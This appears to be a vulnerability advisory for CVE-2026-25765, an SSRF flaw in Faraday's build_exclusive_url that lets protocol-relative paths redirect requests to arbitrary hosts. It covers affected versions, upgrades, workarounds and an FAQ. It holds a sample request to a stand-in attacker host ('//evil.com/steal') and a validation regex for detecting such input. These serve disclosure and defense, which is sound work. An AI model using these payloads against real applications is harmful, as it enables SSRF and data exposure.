CVE-2026-25765: Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url
Impact
Faraday's buildexclusiveurl method (in lib/faraday/connection.rb) uses Ruby's URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references that override the base URL's host/authority component.
This means that if any application passes user-controlled input to Faraday's get(), post(), buildurl(), or other request methods, an attacker can supply a protocol-relative URL like //attacker.com/endpoint to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF).
The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with /, so protocol-relative URLs bypass it entirely.
Example: ruby conn = Faraday.new(url: 'https://api.internal.com') conn.get('//evil.com/steal') # Request is sent to https://evil.com/steal instead of api.internal.com
Patches
Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.
Workarounds
NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.
Applications should validate and sanitize any user-controlled input before passing it to Faraday request methods. Specifically:
- Reject or strip input that starts with // followed by a non-/ character - Use an allowlist of permitted path prefixes - Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday
Example validation: ruby def safepath(userinput) raise ArgumentError, "Invalid path" if userinput.match?(%r{\A//[^/]}) userinput end
Other sources
Faraday is an HTTP client library abstraction layer that provides a common interface over many adapters. Prior to 2.14.1, Faraday's buildexclusiveurl method (in lib/faraday/connection.rb) uses Ruby's URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references that override the base URL's host/authority component. This means that if any application passes user-controlled input to Faraday's get(), post(), buildurl(), or other request methods, an attacker can supply a protocol-relative URL like //attacker.com/endpoint to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF). This vulnerability is fixed in 2.14.1.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
rubygems/faradayto a version that resolves this vulnerability.Fixed in 1.10.5 - Upgrade
Upgrade
rubygems/faradayto a version that resolves this vulnerability.Fixed in 2.14.1 - Upgrade
Upgrade
Faradayto a version that resolves this vulnerability.Fixed in 2.14.1 - Configuration
Before passing any user-controlled input to Faraday request methods (e.g., get(), post(), build_url()), validate/sanitize it so it is rejected or stripped if it matches a protocol-relative URL form like //evil.com/path; for example, raise an error when user_input.match?(%r{\A//[^/]}).
Faraday (build_exclusive_url) protocol-relative path handling = Reject or strip protocol-relative URLs starting with // followed by a non-/ character - Configuration
If upgrading Faraday to 2.14.1 is not possible, alternatively prepend ./ to all user-supplied paths before passing them to Faraday request methods so protocol-relative inputs (e.g., //evil.com/steal) cannot override the base URL host/authority.
Faraday (application-side input sanitization) User-supplied path prefix = Prepend ./ to all user-supplied paths
Event History
Frequently Asked Questions
What is the severity of CVE-2026-25765?
CVE-2026-25765 is considered a high severity vulnerability due to the potential for SSRF attacks via protocol-relative URL host override.
How do I fix CVE-2026-25765?
To fix CVE-2026-25765, upgrade Faraday to version 2.14.1 or later.
Which versions of Faraday are affected by CVE-2026-25765?
Faraday versions up to and including 2.14.0 are affected by CVE-2026-25765.
What type of vulnerability is CVE-2026-25765?
CVE-2026-25765 is an SSRF vulnerability that occurs due to improper handling of URLs in Faraday's `build_exclusive_url` method.
Can CVE-2026-25765 lead to data exposure?
Yes, CVE-2026-25765 can potentially lead to data exposure by allowing attackers to access internal services through SSRF.